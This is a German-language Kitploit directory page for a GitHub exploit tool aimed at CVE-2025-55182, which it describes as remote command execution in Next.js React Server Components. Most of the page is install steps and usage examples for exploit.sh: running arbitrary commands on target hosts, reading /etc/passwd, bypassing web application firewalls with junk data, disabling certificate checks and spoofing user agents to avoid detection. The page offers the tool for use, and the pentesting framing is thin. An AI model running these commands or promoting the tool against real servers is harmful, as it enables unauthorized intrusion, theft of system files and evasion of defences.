Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182-poc-tool — Automatisiertes Exploit-Tool für CVE-2025-55182 in Next.js React Server Components. Ermöglicht Remote-Befehlsausführung mit integrierter WAF-Umgehung, benutzerdefinierten Headern und Batch-Scanning für Penetrationstests. | Kitploit
Tools/GitHubGitHub/dh4v4l8/cve-2025-55182-poc-tool
SchwachstellenscannerExploitationWebanwendungs-ExploitationWAF-UmgehungPenetrationstestsRemote-Access-Tool
GitHubdh4v4l8/cve-2025-55182-poc-tool

CVE-2025-55182-poc-tool

Automatisiertes Exploit-Tool für CVE-2025-55182 in Next.js React Server Components. Ermöglicht Remote-Befehlsausführung mit integrierter WAF-Umgehung, benutzerdefinierten Headern und Batch-Scanning für Penetrationstests.

Repository anzeigen
314vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182-poc-tool

Ein leistungsstarkes Exploit-Tool zur Erkennung und Ausnutzung der CVE-2025-55182-Sicherheitslücke in Next.js React Server Components. Dieses Tool ermöglicht die Fernausführung von Befehlen (RCE) in verwundbaren Next.js-Anwendungen mit integrierten WAF-Umgehungsfunktionen.

logo

Überblick

CVE-2025-55182 ist eine kritische Sicherheitslücke in Next.js React Server Components, die es entfernten Angreifern ermöglicht, beliebige Befehle auf verwundbaren Servern auszuführen. Dieses Tool bietet eine automatisierte Möglichkeit, diese Sicherheitslücke zu erkennen und auszunutzen.

Funktionen

  • Remote-Befehlsausführung: Ausführen beliebiger Befehle auf verwundbaren Next.js-Servern

  • WAF-Umgehung: Integrierte Umgehung der Web Application Firewall mit konfigurierbaren Junk-Daten

  • Unterstützung für benutzerdefinierte Header: Hinzufügen benutzerdefinierter HTTP-Header für Authentifizierung oder andere Zwecke

  • Flexible Zielauswahl: Unterstützung für einzelne Ziele und Batch-Scans

  • Unterstützung mehrerer Protokolle: Automatische HTTPS/HTTP-Erkennung und -Handhabung

  • Benutzerdefinierte Timeouts: Konfigurierbare Anforderungs-Timeouts für verschiedene Netzwerkbedingungen

  • SSL-Überprüfungskontrolle: Option zur Deaktivierung der SSL-Zertifikatsprüfung

  • Benutzerdefinierte User-Agents: Spoofing von User-Agents zur Vermeidung der Erkennung

Schnellinstallation

root@kitploit:~
# Repository klonen
git clone https://github.com/Dh4v4l8/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool

# Skript ausführbar machen
chmod +x exploit.sh

# Installation testen
./exploit.sh -h

Verwendung

Das Tool stellt mehrere Befehlszeilenoptionen zur Verfügung, mit denen Forscher Anfragen anpassen, Verkehr simulieren oder Filterebenen testen können.

root@kitploit:~
Usage: ./exploit.sh [OPTIONS]

Options:
  -d, --domain          Target domain/URL (default: http://localhost:3000)
                        If no protocol specified, defaults to https://
  -c, --command         Command to execute (default: id)
  -w, --waf-bypass      Enable WAF bypass with junk data (default: 128KB)
  --waf-size SIZE       WAF bypass data size in KB (default: 128)
  --timeout SECONDS     Request timeout in seconds (default: 15)
  -k, --insecure        Disable SSL certificate verification
  --user-agent AGENT    Custom User-Agent string
  -h, --help            Show this help message

Grundlegende Verwendung

root@kitploit:~
# Prüfen, ob Ziel mit Standardbefehl verwundbar ist
./exploit.sh -d https://target.com

# Benutzerdefinierten Befehl ausführen
./exploit.sh -d https://target.com -c "whoami"

# Systemdateien lesen
./exploit.sh -d https://target.com -c "cat /etc/passwd"

Fortgeschrittene Verwendung

root@kitploit:~
# WAF-Umgehung aktivieren
./exploit.sh -d https://target.com -c "ls -la" -w

# Benutzerdefinierte WAF-Umgehungsgröße (256 KB)
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256

# SSL-Überprüfung deaktivieren
./exploit.sh -d https://target.com -c "id" -k

# Benutzerdefiniertes Timeout
./exploit.sh -d https://target.com -c "ping -c 3 google.com" --timeout 30

# Benutzerdefinierter User-Agent
./exploit.sh -d https://target.com -c "id" --user-agent "CustomScanner/1.0"

Danksagungen

  • Dieses Tool basiert auf Forschungsergebnissen der Sicherheitsgemeinschaft. Besonderer Dank geht an:

infosec_au

zack0x01

Tool herunterladen